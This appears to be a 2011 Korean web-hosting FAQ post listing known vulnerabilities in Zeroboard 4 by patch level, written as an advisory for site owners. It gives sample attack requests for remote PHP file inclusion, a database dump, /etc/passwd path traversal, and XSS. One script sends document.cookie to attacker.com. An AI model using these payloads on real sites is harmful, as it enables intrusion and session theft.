|
|
|
|
|
|
|
|
분류 : 웹호스팅 제목: 제로보드4의 취약점은 어떤게 있나요? |
|
글쓴이:호스팅팀 날짜: 2011.07.19. 20:38:56 조회:34440 추천:0 글쓴이IP: |
|
|
파일:
첨부파일이 없습니다. |
|
|
|
|
[제로보드] 제로보드4 버전별 취약점 정리
버전 정보는 제로보드4 어드민 또는 설치된 디렉토리의 license.txt 에서 확인이 가능합니다.
1.제로보드 4 게시판의 취약성을 이용한 파일 변조
bbs/icon 폴더에 group_qazwsxedc.jpg 파일과 visitLog.php 생성
계정내 확장자가 html, php 파일들에 frame src="악성코드 배포지 URL 삽입 (예: http://h.nexprice.com/css/x.htm)
주로 bbs/폴더내의 파일들에 소스가 삽입됩니다.
계정내 파일들에 iframe 삽입은 없을 수도 있습니다.
제로보드 DB에 zetyx_group_table 생성되고 이 테이블의 header 또는
header_url 에 위 2번과 동일한 악성코드 배포지 URL 생성.
2. login.php 파일의 PHP Injection 취약점 / pl2 이하
login.php?group_no=1을 실행하여 취약점을 확인한 뒤,
login.php?group_no=1&file=[경로]를 호출하여 공격함
ex) login.php?group_no=1&file=test/injection.txt
echo "해킹이 가능합니다.";
?>
3. MySQL DB 덤프 취약점 / pl3 이하
admin_setup.php?_zb_lib_included=true&exec=db_dump&member=1
4. include/write.php 파일의 원격 PHP Injection 취약점 / pl4 이하
05년 호스팅 업체 해킹의 대표적인 사례
echo " echo "해킹이 가능합니다."; ?>";
?>
ex) include/write.php?dir=http://[원격 스크립트 주소]
5. check_user_id.php 파일의 XSS 취약점 / pl4 이하
heck_user_id.php?user_id=<script>alert(document.cookie);</script>
원격지 주소로 쿠키 값을 전송하기
<script> windows.location.href = 'http://attacker.com/write.php?val=' + document:cookie; </script>
6. skin/nzeo_vote/error.php 파일의 원격 PHP Injection 취약점 / pl5 이하
3번과 유사
7. 웹서버의 시스템 파일 노출 취약점 / pl5 이하
_head.php?_zb_path=../../../../etc/passwd%00
8. 정규표현식을 우회한 PHP Injection 취약점 / pl5 이하
정규표현식에 Null 문자() 삽입 시 그 문자까지 만을 정규표현식으로 인식하는 PHP의 특성
9. 비밀게시물을 열람할 수 있는 취약점 / pl6 이하
_member_info_included=1 의 변수를 조작하여 비밀글 열람 가능
10. .htaccess 파일업로드 취약점 / pl7 이하
.htaccess 파일이 업로드가 가능함
11. download.php 의 SQL Injection 취약점 / pl7 이하
download 회수를 paros를 통해 HTTP 헤더를 조작하여 변경할 수 있음
12. 쪽지기능의 XSS 취약점 / pl7 이하
쪽지에 XSS를 넣을경우 상대방에게 XSS가 가능함
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| |